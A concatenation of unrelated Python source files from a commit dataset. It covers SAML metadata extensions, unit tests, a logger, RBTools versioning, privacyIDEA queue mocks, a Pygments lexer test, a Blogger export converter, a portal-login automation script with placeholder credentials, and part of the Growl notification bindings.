# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = [
'Runner',
]
import sh
class Runner(object):
def __init__(self, args):
self.args = args
def run(self, image, command):
print("Going to run {0} in {1}".format(command, image))
if self.args.rebuild:
print("Need to rebuild")
sh.ls()
| Python | 0.015951 | |
af75f727e5ec22020c8d91af6a0302ea0e4bda74 | Support for http://docs.oasis-open.org/security/saml/Post2.0/sstc-request-initiation-cd-01.html in the metadata. | src/saml2/extension/reqinit.py | src/saml2/extension/reqinit.py | #!/usr/bin/env python
#
# Generated Thu May 15 13:58:36 2014 by parse_xsd.py version 0.5.
#
import saml2
from saml2 import md
NAMESPACE = 'urn:oasis:names:tc:SAML:profiles:SSO:request-init'
class RequestInitiator(md.EndpointType_):
"""The urn:oasis:names:tc:SAML:profiles:SSO:request-init:RequestInitiator
element """
c_tag = 'RequestInitiator'
c_namespace = NAMESPACE
c_children = md.EndpointType_.c_children.copy()
c_attributes = md.EndpointType_.c_attributes.copy()
c_child_order = md.EndpointType_.c_child_order[:]
c_cardinality = md.EndpointType_.c_cardinality.copy()
def request_initiator_from_string(xml_string):
return saml2.create_class_from_xml_string(RequestInitiator, xml_string)
ELEMENT_FROM_STRING = {
RequestInitiator.c_tag: request_initiator_from_string,
}
ELEMENT_BY_TAG = {
'RequestInitiator': RequestInitiator,
}
def factory(tag, **kwargs):
return ELEMENT_BY_TAG[tag](**kwargs)
| Python | 0 | |
cfa5b544c3d44a7440feca006c01bbd72ecc0286 | Test arena constants | test/test_arena.py | test/test_arena.py | from support import lib,ffi
from qcgc_test import QCGCTest
class ArenaTestCase(QCGCTest):
def test_size_calculations(self):
exp = lib.QCGC_ARENA_SIZE_EXP
size = 2**exp
bitmap = size / 128
effective_cells = (size - 2 * bitmap) / 16
self.assertEqual(size, lib.qcgc_arena_size)
self.assertEqual(bitmap, lib.qcgc_arena_bitmap_size)
self.assertEqual(effective_cells, lib.qcgc_arena_cells_count)
| Python | 0.000001 | |
12270bc14b44343b4babef3b6445074685b59bd7 | Create histogram.py | python/histogram.py | python/histogram.py | import sys
histogram = dict()
bin_width = 5
max_index = 0
for line in sys.stdin:
if not line:
continue
number = int(line)
bin_index = number / bin_width
if bin_index not in histogram:
histogram[bin_index] = 0
histogram[bin_index] = histogram[bin_index] + 1
if bin_index > max_index:
max_index = bin_index
for index in range(max_index) + [max_index + 1]:
if index not in histogram:
histogram[index] = 0
count = histogram[index]
if count == None:
count = 0
print "[{0}, {1}> : {2}".format(index * bin_width, (index + 1) * bin_width, count)
| Python | 0.00286 | |
8b6b30997816bae1255c3e035851b8e6edb5e4c7 | add a test | python/test/test.py | python/test/test.py | import unittest
import os
import couchapp.utils
class CouchAppTest(unittest.TestCase):
def testInCouchApp(self):
dir_, file_ = os.path.split(__file__)
if dir_:
os.chdir(dir_)
startdir = os.getcwd()
try:
os.chdir("in_couchapp")
os.chdir("installed")
cwd = os.getcwd()
self.assertEquals(couchapp.utils.in_couchapp(), cwd,
"in_couchapp() returns %s" %
couchapp.utils.in_couchapp())
os.chdir(os.path.pardir)
os.chdir("no_install")
self.assert_(not couchapp.utils.in_couchapp(),
"Found a couchapp at %s but didn't expect one!"
% couchapp.utils.in_couchapp())
finally:
os.chdir(startdir)
if __name__ == "__main__":
unittest.main()
| Python | 0.000002 | |
952438d97fc0c96afaf505469cc7b9cb0c9f287d | Add config file with the list of relays availables | relay_api/conf/config.py | relay_api/conf/config.py | # List of available relays
relays = [
{
"id": 1,
"gpio": 20,
"name": "relay 1"
},
{
"id": 2,
"gpio": 21,
"name": "relay 2"
}
]
| Python | 0 | |
b5083af1cce5fb5b9c7bb764b18edce8640bd3a1 | add utilLogger.py from toLearn/ and update to v0.4 | utilLogger.py | utilLogger.py | import os.path
import datetime
'''
v0.4 2015/11/30
- comment out test run
- add from sentence to import CUtilLogger
v0.3 2015/11/30
- change array declaration to those using range()
- __init__() does not take saveto arg
- automatically get file name based on the date
v0.2 2015/11/30
- update add() to handle auto save feature
v0.1 2015/11/30
- add save()
- add add()
- add __init__()
'''
class CUtilLogger:
def __init__(self):
self.idx = 0
self.bufferNum = 5
self.strs = [ 0 for idx in range(10)]
return
def clear(self):
for idx in range(0, self.idx):
self.strs[idx] = ""
self.idx = 0
def add(self,str):
self.strs[self.idx] = str
self.idx = self.idx + 1
# print self.idx
if self.idx >= self.bufferNum:
self.save()
self.clear()
def save(self):
today = datetime.date.today()
yymmdd = today.strftime("%y%m%d")
filename = yymmdd + ".log"
with open(filename, "a") as logfd:
for idx in range(0, self.idx):
text = self.strs[idx] + "\r\n"
logfd.write(text)
# Usage
'''
from utilLogger import CUtilLogger
logger = CUtilLogger()
for loop in range(0, 31):
logger.add("test")
logger.save() # to save the rest
logger = None
'''
| Python | 0 | |
99f5d264ab88573e0541c529eca905b8a1d16873 | Bump to 0.5.3 dev. | rbtools/__init__.py | rbtools/__init__.py | #
# __init__.py -- Basic version and package information
#
# Copyright (c) 2007-2009 Christian Hammond
# Copyright (c) 2007-2009 David Trowbridge
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# The version of RBTools
#
# This is in the format of:
#
# (Major, Minor, Micro, alpha/beta/rc/final, Release Number, Released)
#
VERSION = (0, 5, 3, 'alpha', 0, False)
def get_version_string():
version = '%s.%s' % (VERSION[0], VERSION[1])
if VERSION[2]:
version += ".%s" % VERSION[2]
if VERSION[3] != 'final':
if VERSION[3] == 'rc':
version += ' RC%s' % VERSION[4]
else:
version += ' %s %s' % (VERSION[3], VERSION[4])
if not is_release():
version += " (dev)"
return version
def get_package_version():
version = '%s.%s' % (VERSION[0], VERSION[1])
if VERSION[2]:
version += ".%s" % VERSION[2]
if VERSION[3] != 'final':
version += '%s%s' % (VERSION[3], VERSION[4])
return version
def is_release():
return VERSION[5]
__version_info__ = VERSION[:-1]
__version__ = get_package_version()
| #
# __init__.py -- Basic version and package information
#
# Copyright (c) 2007-2009 Christian Hammond
# Copyright (c) 2007-2009 David Trowbridge
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# The version of RBTools
#
# This is in the format of:
#
# (Major, Minor, Micro, alpha/beta/rc/final, Release Number, Released)
#
VERSION = (0, 5, 2, 'final', 0, True)
def get_version_string():
version = '%s.%s' % (VERSION[0], VERSION[1])
if VERSION[2]:
version += ".%s" % VERSION[2]
if VERSION[3] != 'final':
if VERSION[3] == 'rc':
version += ' RC%s' % VERSION[4]
else:
version += ' %s %s' % (VERSION[3], VERSION[4])
if not is_release():
version += " (dev)"
return version
def get_package_version():
version = '%s.%s' % (VERSION[0], VERSION[1])
if VERSION[2]:
version += ".%s" % VERSION[2]
if VERSION[3] != 'final':
version += '%s%s' % (VERSION[3], VERSION[4])
return version
def is_release():
return VERSION[5]
__version_info__ = VERSION[:-1]
__version__ = get_package_version()
| Python | 0 |
90948c62d1d01800c6a75dd5f15d7fef334dc66f | Add python unittests | noticeboard/test_noticeboard.py | noticeboard/test_noticeboard.py | import os
import json
import tempfile
import unittest
from noticeboard import noticeboard
class TestNoticeboard(unittest.TestCase):
def setUp(self):
self.fd, noticeboard.app.config["DATABASE"] = tempfile.mkstemp()
noticeboard.app.config["TESTING"] = True
self.app = noticeboard.app.test_client()
noticeboard.init_db()
def tearDown(self):
os.close(self.fd)
os.unlink(noticeboard.app.config["DATABASE"])
def decode_json(self, resp):
return json.loads(resp.data.decode('utf-8'))
def test_no_note_by_default(self):
resp = self.app.get("/api/v1/notes")
data = self.decode_json(resp)
self.assertEqual(data["notes"], [])
def test_creating_note_with_text(self):
text = "Foo Bar Baz"
resp = self.app.get("/api/v1/notes/create/{}".format(text))
data = self.decode_json(resp)
self.assertEqual(data["note"]["text"], text)
def test_created_note_can_be_retrieved(self):
text = "Hello World!"
resp = self.app.get("/api/v1/notes/create/{}".format(text))
created_note = self.decode_json(resp)["note"]
resp = self.app.get("/api/v1/notes/{}".format(created_note["id"]))
retrieved_note = self.decode_json(resp)["note"]
self.assertEqual(retrieved_note, created_note)
def test_created_note_shows_up_in_notes(self):
text = "Hello, 世界!"
resp = self.app.get("/api/v1/notes/create/{}".format(text))
note1 = self.decode_json(resp)["note"]
text = "This is fun!"
resp = self.app.get("/api/v1/notes/create/{}".format(text))
note2 = self.decode_json(resp)["note"]
resp = self.app.get("/api/v1/notes")
notes = self.decode_json(resp)["notes"]
self.assertIn(note1, notes)
self.assertIn(note2, notes)
| Python | 0.000003 | |
17fcdd9a01be24ad9562e5a558e2dd65a84d1a19 | Add missing tests/queuemock.py | tests/queuemock.py | tests/queuemock.py | # -*- coding: utf-8 -*-
#
# 2019-01-07 Friedrich Weber <friedrich.weber@netknights.it>
# Implement queue mock
#
# License: AGPLv3
# contact: http://www.privacyidea.org
#
# This code is free software; you can redistribute it and/or
# modify it under the terms of the GNU AFFERO GENERAL PUBLIC LICENSE
# License as published by the Free Software Foundation; either
# version 3 of the License, or any later version.
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNE7SS FOR A PARTICULAR PURPOSE. See the
# GNU AFFERO GENERAL PUBLIC LICENSE for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import functools
import mock
from privacyidea.lib.queue import get_job_queue
from privacyidea.config import TestingConfig
from privacyidea.lib.queue.promise import ImmediatePromise
from privacyidea.lib.queue.base import BaseQueue, QueueError
from tests.base import OverrideConfigTestCase
class FakeQueue(BaseQueue):
"""
A queue class that keeps track of enqueued jobs, for usage in unit tests.
"""
def __init__(self, options):
BaseQueue.__init__(self, options)
self._jobs = {}
self.reset()
@property
def jobs(self):
return self._jobs
def reset(self):
self.enqueued_jobs = []
def add_job(self, name, func, fire_and_forget=False):
if name in self._jobs:
raise QueueError(u"Job {!r} already exists".format(name))
@functools.wraps(func)
def wrapper(*args, **kwargs):
result = func(*args, **kwargs)
if fire_and_forget:
return None
else:
return result
self._jobs[name] = wrapper
def enqueue(self, name, args, kwargs):
if name not in self._jobs:
raise QueueError(u"Unknown job: {!r}".format(name))
self.enqueued_jobs.append((name, args, kwargs))
return ImmediatePromise(self._jobs[name](*args, **kwargs))
class MockQueueTestCase(OverrideConfigTestCase):
"""
A test case class which has a mock job queue set up.
You can check the enqueued jobs with::
queue = get_job_queue()
self.assertEqual(queue.enqueued_jobs, ...)
The ``enqueued_jobs`` attribute is reset for each test case.
"""
class Config(TestingConfig):
PI_JOB_QUEUE_CLASS = "fake"
@classmethod
def setUpClass(cls):
""" override privacyidea.config.config["testing"] with the inner config class """
with mock.patch.dict("privacyidea.lib.queue.QUEUE_CLASSES", {"fake": FakeQueue}):
super(MockQueueTestCase, cls).setUpClass()
def setUp(self):
get_job_queue().reset()
OverrideConfigTestCase.setUp(self)
| Python | 0.000003 | |
6083124c110e0ce657b78f6178cd7464996a042b | add tests I want to pass | tests/test_geometries.py | tests/test_geometries.py | """This contains a set of tests for ParaTemp.geometries"""
########################################################################
# #
# This script was written by Thomas Heavey in 2017. #
# theavey@bu.edu thomasjheavey@gmail.com #
# #
# Copyright 2017 Thomas J. Heavey IV #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #
# implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# #
########################################################################
from __future__ import absolute_import
import pytest
class TestXYZ(object):
@pytest.fixture
def xyz(self):
from ..ParaTemp.geometries import XYZ
return XYZ('tests/test-data/stil-3htmf.xyz')
def test_n_atoms(self, xyz):
assert xyz.n_atoms == 66
def test_energy(self, xyz):
assert xyz.energy == -1058630.8496721
| Python | 0 | |
8c9034e91d82487ae34c592b369a3283b577acc8 | Add a new test for the latest RegexLexer change, multiple new states including '#pop'. | tests/test_regexlexer.py | tests/test_regexlexer.py | # -*- coding: utf-8 -*-
"""
Pygments regex lexer tests
~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: 2007 by Georg Brandl.
:license: BSD, see LICENSE for more details.
"""
import unittest
from pygments.token import Text
from pygments.lexer import RegexLexer
class TestLexer(RegexLexer):
"""Test tuple state transitions including #pop."""
tokens = {
'root': [
('a', Text.Root, 'rag'),
('e', Text.Root),
],
'beer': [
('d', Text.Beer, ('#pop', '#pop')),
],
'rag': [
('b', Text.Rag, '#push'),
('c', Text.Rag, ('#pop', 'beer')),
],
}
class TupleTransTest(unittest.TestCase):
def test(self):
lx = TestLexer()
toks = list(lx.get_tokens_unprocessed('abcde'))
self.assertEquals(toks,
[(0, Text.Root, 'a'), (1, Text.Rag, 'b'), (2, Text.Rag, 'c'),
(3, Text.Beer, 'd'), (4, Text.Root, 'e')])
| Python | 0 | |
ba0c292753355e5ff7e8e131c61e8086f31b3b76 | Create src/task_2_0.py | src/task_2_0.py | src/task_2_0.py | # Раздел 1. Задача 2. Вариант 0.
# Напишите программу, которая будет выводить на экран наиболее понравившееся вам высказывание, автором которого является Ф.М.Достоевский. Не забудьте о том, что автор должен быть упомянут на отдельной строке.
print("Жизнь, везде жизнь, жизнь в нас самих, а не во внешнем.")
print("\n\t\t\t\t\tФ.М.Достоевский")
input("\n\nНажмите Enter для выхода.")
| Python | 0.000039 | |
6f00204ae2603063eafbd74a369e9da0864854ca | Create new monthly violence polls | poll/management/commands/create_new_violence_polls.py | poll/management/commands/create_new_violence_polls.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from django.core.management.base import BaseCommand
import traceback
from poll.models import Poll
from unregister.models import Blacklist
from django.conf import settings
from optparse import make_option
from poll.forms import NewPollForm
from django.contrib.sites.models import Site
from django.contrib.auth.models import User
from rapidsms.models import Contact
from django.db.models import Q
class Command(BaseCommand):
help = "Create new violence polls"
option_list = BaseCommand.option_list + (
make_option('-n', '--name', dest='n'),
make_option('-t', '--poll_type', dest='t'),
make_option('-q', '--question', dest='q'),
make_option('-r', '--default_response', dest='r'),
make_option('-c', '--contacts', dest='c'),
make_option('-u', '--user', dest='u'),
make_option('-s', '--start_immediately', dest='s'),
make_option('-e', '--response_type', dest='e'),
make_option('-g', '--groups', dest='g'),
)
def handle(self, **options):
edtrac_violence_girls = Poll.objects.create(
name="edtrac_violence_girls",
type="n",
question="How many cases of violence against girls were recorded this month? Answer in figures e.g. 5",
default_response='',
user=User.objects.get(username='admin'),
)
edtrac_violence_girls.sites.add(Site.objects.get_current())
edtrac_violence_boys = Poll.objects.create(
name="edtrac_violence_boys",
type="n",
question="How many cases of violence against boys were recorded this month? Answer in figures e.g. 4",
default_response='',
user = User.objects.get(username='admin'),
)
edtrac_violence_boys.sites.add(Site.objects.get_current())
edtrac_violence_reported = Poll.objects.create(
name='edtrac_violence_reported',
type='n',
question='How many cases of violence were referred to the Police this month? Answer in figures e.g. 6',
default_response='',
user=User.objects.get(username='admin'),
)
edtrac_violence_reported.sites.add(Site.objects.get_current())
| Python | 0.000002 | |
23c09555221b3f7500a4c658452c9c0cb223799c | Add evaluation using random forest | Train_SDAE/tools/evaluate_model.py | Train_SDAE/tools/evaluate_model.py | import numpy as np
# import pandas as pd
# import sys
from scipy.special import expit
from sklearn import ensemble
def get_activations(exp_data, w, b):
exp_data = np.transpose(exp_data)
prod = exp_data.dot(w)
prod_with_bias = prod + b
return( expit(prod_with_bias) )
# Order of *args: first all the weights and then all the biases
def run_random_forest(nHLayers, exp_data, labels, *args):
print len(args[0]), len(args[0][0]), len(args[0][1])
print len(args[0][2])
print "NewLine!\n", len(args[0][3])
print "NewLine!\n", len(args[0][4])
assert len(exp_data) == len(labels)
# I think they should be already transposed when running the code. Will see
act = exp_data#.T
for i in range(nHLayers):
print('Weights and biases for layer: ' + str(i+1))
print np.asarray(args[0][i]).shape, np.asarray(args[0][nHLayers + i]).shape
act = get_activations(act.T, args[0][i], args[0][nHLayers + i])
rf = ensemble.RandomForestClassifier(n_estimators=1000, oob_score=True, max_depth=5)
rfit = rf.fit(act, labels)
print('OOB score: %.2f\n' % rfit.oob_score_)
| Python | 0 | |
009df3372804fa946b7e1bd4c0827e887b964b38 | Convert blogger to simple xml | convert.py | convert.py | from bs4 import BeautifulSoup
import io
import markdown2
import time
import codecs
file = io.open("Import/blog-03-03-2013.xml")
file_contents = file.read(-1)
#lxml xpath doesn't seem to understand blogger export
soup = BeautifulSoup(file_contents)
entries = soup("entry")
count = 0
def formatTime(timefield):
time_obj = time.strptime(entry(timefield)[0].string[0:16], "%Y-%m-%dT%H:%M")
return time.strftime("%Y%m%d%H%M%S", time_obj)
for entry in entries:
categories = entry("category")
tags = []
post = False
for category in categories:
if category["term"] == "http://schemas.google.com/blogger/2008/kind#post":
post = True
if category["scheme"] == "http://www.blogger.com/atom/ns#" and category["term"]:
tags.append(category["term"])
if post:
pub = formatTime("published")
updated = formatTime("updated")
filename_xml = "%s.blogger.xml" % pub
title = entry("title")[0].string
content = entry("content")[0].string
blog_file = io.open("Export/" + filename_xml, "w")
blog_file.write("<blog>\n\t<title>%s</title>\n\t<content><![CDATA[%s]]></content>\n</blog>" % (title, content))
blog_file.close()
count += 1
print "Found %d posts" % count
print "done!" | Python | 0.999999 | |
8348ce87a68592e7108c43687ebfdf12684a1914 | Add elementTypes.py file | elementTypes.py | elementTypes.py |
class elementC3D10():
def __init__(self):
self.name = 'C3D10'
self.desc = 'Quadratic tetrahedral element'
self.numNodes = 10
self.numIntPnts = 4
self.N = array(self.numNodes)
self.setIpcs()
def setIpcs(self):
alpha = 0.1770833333
beta = 0.4687500000
self.ipcs = numpy.array([[alpha,alpha,alpha],
[beta, alpha,alpha],
[alpha,beta, alpha],
[alpha,alpha,beta ]])
def shapeFunctionMatrix(self,ipc):
g,h,r=ipc
self.N[0] = (2.0*(1.0-g-h-r)-1.0)*(1.0-g-h-r)
self.N[1] = (2.0*g-1.0)*g
self.N[2] = (2.0*h-1.0)*h
self.N[3] = (2.0*r-1.0)*r
self.N[4] = 4.0*(1.0-g-h-r)*g
self.N[5] = 4.0*g*h
self.N[6] = 4.0*(1.0-g-h-r)*h
self.N[7] = 4.0*(1.0-g-h-r)*r
self.N[8] = 4.0*g*r
self.N[9] = 4.0*h*r
def interpFunc(self,nv):
return np.dot(self.N,nv)
class elementC3D4():
def __init__(self):
self.name = 'C3D4'
self.desc = 'Linear tetrahedral element'
self.numNodes = 4
self.numIntPnts = 1
self.N = np.array(self.numNodes)
self.setIpcs()
def setIpcs(self):
alpha = 0.33333 # CHECK THESE VALUES
beta = 0.33333 # CHECK THESE VALUES
self.ipcs = np.array([[],[],[]])
def shapeFuncMatrix(self,ipc):
g,h,r=ipc
self.N[0] = (1.0-g-h-r)
self.N[1] = g
self.N[2] = h
self.N[3] = r
def interpFunc(self,nv):
return np.dot(self.N,nv)
| Python | 0.000001 | |
e789fb7246e7b926841f2d2912896fd0a0d14518 | Create login_portal.py | login_portal.py | login_portal.py | from splinter import Browser
print 'Starting...'
browser = Browser('firefox') # using firefox
browser.visit("http://portal.ku.edu.kw/sisapp/faces/login.jspx")
browser.fill('username','xxxxx') # enter student ID
browser.fill('password','yyyyy') # enter password
browser.find_by_id('loginBtn').click() # click login
| Python | 0.000001 | |
82acd4827b2f3f426a6b97f474c54886758cfab7 | add code to update fields | obztak/scratch/update-fields.py | obztak/scratch/update-fields.py | #!/usr/bin/env python
"""
Update survey fields
"""
__author__ = "Alex Drlica-Wagner"
import copy
import fitsio
import numpy as np
import pylab as plt
import skymap
from obztak.utils import fileio
import obztak.delve
from obztak.delve import DelveFieldArray
import argparse
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('old')
parser.add_argument('new')
parser.add_argument('-o','--outfile',default='update_target_fields.csv')
args = parser.parse_args()
db = DelveFieldArray.load_database()
old = DelveFieldArray.load(args.old)
new = DelveFieldArray.load(args.new)
print("Running comparing to new fields...")
if len(old) != len(new):
print("Different number of fields")
delve = np.in1d(new.unique_id,db.unique_id)
#done = (new['PRIORITY'] < 0) & (old['PRIORITY'] >= 0)
done = (new['PRIORITY'] < 0) & np.in1d(new.unique_id, old.unique_id[old['PRIORITY'] >= 0])
plt.figure()
smap = skymap.SurveyMcBryde()
smap.draw_fields(new[done & ~delve])
smap.draw_des()
plt.title('New')
plt.show()
# Write here
out = DelveFieldArray.load(args.old)
### There are two ways of doing this that should give the same answers...
print("Running DelveSurvey.update_covered_fields...")
update = obztak.delve.DelveSurvey.update_covered_fields(old)
done = (update['PRIORITY'] < 0) & (old['PRIORITY'] >= 0)
delve = np.in1d(update.unique_id,db.unique_id)
plt.figure()
smap = skymap.SurveyMcBryde()
smap.draw_fields(update[done & ~delve])
#smap.draw_fields(update[done])
plt.title('Update')
print("Writing %s..."%args.outfile)
update.write(args.outfile)
# double check
assert len(fileio.read_csv(args.old)) == len(fileio.read_csv(args.outfile))
print("REMINDER: gzip the output file and move to data directory.")
| Python | 0.000001 | |
7d5dcaa0a72dbdd78e192f082bbdf261de1d8963 | Delete occurrences of an element if it occurs more than n times | Codewars/DeleteOccurrencesOfElementOverNTimes.py | Codewars/DeleteOccurrencesOfElementOverNTimes.py | # implemented with list comprehension with side-effects and a global variable
# there's a simpler way to do it with list appends that's probably no less efficient, since Python arrays are dynamic, but I wanted to try this out instead
from collections import Counter
c = Counter()
# for use in list comprehensions with side effects! Naughty...
def count_and_return(x):
c[x] += 1
return x
def delete_nth(arr,max_e):
if max_e <= 0:
return []
global c
c = Counter()
return [count_and_return(x) for x in arr if c[x] < max_e] # note: condition is evaluated before the function is applied to x, hence < instead of <=
| Python | 0.000001 | |
c7c7281fc964ac25aea291f18bbf29013f3f3d58 | question 7.1 | crack_7_1.py | crack_7_1.py | def fib_slow(number):
if number == 0: return 1
elif number == 1: return 1
else:
return fib_slow(number-1) + fib_slow(number-2)
def fib_fast(number):
if numbers[number] == 0:
if number == 0 or number == 1:
numbers[number] = 1
return numbers[number]
else:
temp = fib_fast(number-1) + fib_fast(number-2)
numbers[number] = temp
return numbers[number]
else:
return numbers[number]
numbers = [0] * 6
if __name__ == '__main__':
print fib_fast(5) | Python | 0.99996 | |
895570ad25b1475c1e9ce85a78f22f268dce8dec | Add visualization script | tools/visoutput.py | tools/visoutput.py | #!/usr/bin/env python
"""
An animated image
"""
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider, Button
import sys
d_arr = []
t_arr = []
hs =[]
width = 0.35
maxpressure = 0.0
for line in sys.stdin:
toks = line.split(" ")
t_arr.append(toks[0])
d_arr.append((float(toks[1])-1)*10)
histline = []
histline.append(toks[3]) #1
histline.append(toks[3]) #2
histline.append(toks[5]) #3
histline.append(toks[7]) #4
histline.append(toks[9]) #5
histline.append(toks[11])#6
histline.append(toks[13])#7
histline.append(toks[15])#8
histline.append(toks[17])#9
histline.append(toks[19])#10
histline.append(toks[21])#11
histline.append(toks[23])#12
histline.append(toks[25])#13
histline.append(toks[27])#14
histline.append(toks[29])#15
histline.append(toks[31])#16
if (float(max(histline)) > maxpressure):
maxpressure = float(max(histline))
hs.append(histline)
fig = plt.figure()
fig.add_subplot(121)
l, = plt.plot(t_arr,d_arr)
plt.gca().invert_yaxis()
ax = fig.add_subplot(122)
ax.set_ylim(0.7, maxpressure)
nbComp = np.arange(len(histline))
rect = ax.bar(nbComp,hs[0],width)
ax.set_ylabel('Pressure')
ax.set_title('Pressure by compartment')
ax.set_xticks(nbComp + width)
ax.set_xticklabels(('C01', 'C02', 'C03', 'C04', 'C05','C06','C07','C08','C09','C10','C11','C12'))
axtime = plt.axes([0.2, 0.02, 0.65, 0.03])
stime= Slider(axtime, 'Time', 0, len(hs)-1, valinit=0,valfmt='%d')
def update(val):
time = int(stime.val)
ax.clear()
rect = ax.bar(nbComp,hs[time],width)
ax.set_ylim(0.7, maxpressure)
fig.canvas.draw()
stime.on_changed(update)
# plt.subplot(2, 1, 2)
# plt.plot(t_arr,bc1_arr, label="cmp 1")
# plt.plot(t_arr,bc2_arr, label="cmp 2")
# plt.plot(t_arr,bc3_arr, label="cmp 3")
# plt.plot(t_arr,bc4_arr, label="cmp 4")
# plt.plot(t_arr,bc5_arr, label="cmp 5")
# plt.plot(t_arr,bc6_arr, label="cmp 6")
# plt.plot(t_arr,bc7_arr, label="cmp 7")
# plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
plt.show() | Python | 0.000001 | |
1c4adbe07892d95ca6254dcc2e48e11eb2141fa7 | Create pixelconversor.py | Art-2D/pixelconversor.py | Art-2D/pixelconversor.py | //This program rake a image an convert it in 2D pixel art.
| Python | 0.000003 | |
096c8165ec2beacbc4897285b8fed439765d3e01 | Add test on update document title | test/integration/ggrc/models/test_document.py | test/integration/ggrc/models/test_document.py | # Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Integration tests for Document"""
from ggrc.models import all_models
from integration.ggrc import TestCase
from integration.ggrc.api_helper import Api
from integration.ggrc.models import factories
class TestDocument(TestCase):
"""Document test cases"""
# pylint: disable=invalid-name
def setUp(self):
super(TestDocument, self).setUp()
self.api = Api()
def test_update_title(self):
"""Test update document title."""
create_title = "test_title"
update_title = "update_test_title"
document = factories.DocumentFactory(title=create_title)
response = self.api.put(document, {"title": update_title})
self.assert200(response)
self.assertEqual(all_models.Document.query.get(document.id).title,
update_title)
| Python | 0 | |
5172dcb5edd09afce992d237bd31700251fca4bd | Remove useless optional style argument to notify() | Bindings/python/Growl.py | Bindings/python/Growl.py | """
A Python module that enables posting notifications to the Growl daemon.
See <http://sourceforge.net/projects/growl/> for more information.
Requires PyObjC 1.1 <http://pyobjc.sourceforge.net/> and Python 2.3
<http://www.python.org/>.
Copyright 2003 Mark Rowe <bdash@users.sourceforge.net>
Released under the BSD license.
"""
from Foundation import NSArray, NSDistributedNotificationCenter, NSDictionary, NSNumber
from AppKit import NSWorkspace
class GrowlNotifier(object):
"""
A class that abstracts the process of registering and posting
notifications to the Growl daemon.
You can either pass `applicationName', `notifications',
`defaultNotifications' and `applicationIcon' to the constructor
or you may define them as class-level variables in a sub-class.
`defaultNotifications' is optional, and defaults to the value of
`notifications'. `applicationIcon' is also optional but defaults
to a pointless icon so is better to be specified.
"""
applicationName = 'GrowlNotifier'
notifications = []
defaultNotifications = None
applicationIcon = None
def __init__(self, applicationName=None, notifications=None, defaultNotifications=None, applicationIcon=None):
if applicationName is not None:
self.applicationName = applicationName
if notifications is not None:
self.notifications = notifications
if defaultNotifications is not None:
self.defaultNotifications = defaultNotifications
if applicationIcon is not None:
self.applicationIcon = applicationIcon
def register(self):
"""
Register this application with the Growl daemon.
"""
if not self.applicationIcon:
self.applicationIcon = NSWorkspace.sharedWorkspace().iconForFileType_("txt")
if self.defaultNotifications is None:
self.defaultNotifications = self.notifications
regInfo = {'ApplicationName': self.applicationName,
'AllNotifications': NSArray.arrayWithArray_(self.notifications),
'DefaultNotifications': NSArray.arrayWithArray_(self.defaultNotifications),
'ApplicationIcon': self.applicationIcon.TIFFRepresentation()}
d = NSDictionary.dictionaryWithDictionary_(regInfo)
notCenter = NSDistributedNotificationCenter.defaultCenter()
notCenter.postNotificationName_object_userInfo_deliverImmediately_("GrowlApplicationRegistrationNotification", None, d, True)
def notify(self, noteType, title, description, icon=None, appicon=None, sticky=False):
"""
Post a notification to the Growl daemon.
`noteType' is the name of the notification that is being posted.
